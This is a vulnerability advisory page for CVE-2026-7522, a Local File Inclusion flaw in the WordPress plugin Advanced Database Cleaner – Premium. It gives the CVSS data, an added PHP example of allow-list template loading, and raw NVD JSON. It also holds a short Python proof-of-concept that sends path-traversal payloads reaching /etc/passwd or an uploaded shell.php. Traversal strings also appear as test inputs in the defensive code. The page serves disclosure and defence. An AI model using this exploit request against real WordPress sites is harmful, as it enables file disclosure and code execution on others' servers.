Security Vulnerability Report
CVE-2026-7522 CVSS 8.8 HIGH

CVE-2026-7522

Published: 2026-05-20 05:16:22
Last Modified: 2026-05-20 13:54:55

Description

The Advanced Database Cleaner – Premium plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 4.1.0 via the 'template' parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.
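The description above is the textbook shape of CWE-98 (PHP file inclusion controlled by user input): a request parameter names a template, and the plugin includes whatever path results. As an added example, not the plugin's own code and not from the advisory, the following PHP shows how such a parameter can be handled so that neither path traversal nor an uploaded .php file ever reaches `include`, and so that a Subscriber-level account cannot reach the handler at all. The function names, the AJAX action name, the capability, the template directory and the template names are assumptions made for illustration.

```php
<?php
// Added example (not the plugin's code): allow-list based template loading
// that blocks the Local File Inclusion pattern described in the advisory.
// Hypothetical names: adc_safe_template_path, adc_render_template_ajax,
// the 'templates' directory and the template names are all assumed.

declare(strict_types=1);

/**
 * Map a user-supplied template name to an absolute path, or return null.
 * Three independent checks: allow-list, syntactic sanity, realpath containment.
 */
function adc_safe_template_path(string $requested, string $template_dir, array $allowed): ?string
{
    // 1. The name must be one of the templates the plugin actually ships.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 2. Defence in depth: a template name never contains a separator, NUL or "..".
    //    This runs before any filesystem call, so NUL bytes never reach realpath().
    if (preg_match('/[\/\\\\\0]|\.\./', $requested)) {
        return null;
    }
    $base      = realpath($template_dir);
    $candidate = realpath($template_dir . DIRECTORY_SEPARATOR . $requested . '.php');
    // 3. The resolved file must exist and sit strictly inside the template directory,
    //    which also defeats symlinks pointing out of it.
    if ($base === false || $candidate === false) {
        return null;
    }
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Illustrative AJAX handler (hook name assumed). Two controls sit in front of the
// include: a nonce and an administrator-level capability, so low-privilege
// accounts are rejected before the 'template' value is even looked at.
function adc_render_template_ajax(): void
{
    check_ajax_referer('adc_template', 'nonce');
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }
    $allowed = ['overview', 'tables', 'options'];           // assumed template set
    $dir     = plugin_dir_path(__FILE__) . 'templates';     // assumed location
    $path    = adc_safe_template_path((string) ($_POST['template'] ?? ''), $dir, $allowed);
    if ($path === null) {
        wp_send_json_error('unknown template', 400);
    }
    include $path;
    wp_die();
}
if (function_exists('add_action')) {
    add_action('wp_ajax_adc_render_template', 'adc_render_template_ajax');
}

// Stand-alone self-check (runs from the CLI without WordPress): build a constructed
// temp template directory and confirm traversal-style inputs are rejected.
if (PHP_SAPI === 'cli' && !function_exists('add_action')) {
    $dir = sys_get_temp_dir() . '/adc_tpl_' . bin2hex(random_bytes(4));
    mkdir($dir);
    file_put_contents($dir . '/overview.php', "<?php echo 'ok';");
    $cases = [
        'overview'                        => true,   // shipped template: allowed
        '../../../../etc/passwd'          => false,  // traversal: rejected by allow-list
        '../../wp-content/uploads/shell'  => false,  // uploaded file: rejected by allow-list
        "overview\0"                      => false,  // NUL truncation attempt: rejected
    ];
    foreach ($cases as $input => $expectAllowed) {
        $got = adc_safe_template_path($input, $dir, ['overview']) !== null;
        printf("%-40s %s\n", json_encode($input), $got === $expectAllowed ? 'PASS' : 'FAIL');
    }
    unlink($dir . '/overview.php');
    rmdir($dir);
}
```

Run with `php this_file.php` to see the four constructed cases evaluated. The allow-list alone would already stop the inputs in the advisory; the syntactic and `realpath()` checks are kept so that a future change to the allow-list (for example, accepting names from a settings table) does not silently reopen the include.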

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Advanced Database Cleaner – Premium <= 4.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-7522
# This script demonstrates the exploitation of the LFI vulnerability.
# Attacker needs valid subscriber credentials.
import requests

target_url = "http://example.com/wp-admin/admin-ajax.php"

# Attacker's cookies (Subscriber level)
cookies = {
    "wordpress_logged_in_xxx": "valid_session_cookie_here"
}

# The vulnerable parameter 'template'
# Pointing to a sensitive file (e.g., wp-config.php or an uploaded shell)
payload_data = {
    "action": "adc_ajax_action",
    "template": "../../../../../../../../etc/passwd"  # Or path to a malicious PHP file: "../../wp-content/uploads/shell.php"
}

try:
    response = requests.post(target_url, data=payload_data, cookies=cookies)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text[:500])  # Print first 500 chars
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://docs.sigmaplugin.com/article/97-advanced-database-cleaner-chaneglog
https://sigmaplugin.com/downloads/wordpress-advanced-database-cleaner/
https://www.wordfence.com/threat-intel/vulnerabilities/id/77e4e516-8a12-48ee-9124-27f941b68b13?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-7522",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-20T05:16:22.327",
    "lastModified": "2026-05-20T13:54:54.890",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Advanced Database Cleaner – Premium plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 4.1.0 via the 'template' parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-98"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://docs.sigmaplugin.com/article/97-advanced-database-cleaner-chaneglog",
        "source": "[email protected]"
      },
      {
        "url": "https://sigmaplugin.com/downloads/wordpress-advanced-database-cleaner/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/77e4e516-8a12-48ee-9124-27f941b68b13?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}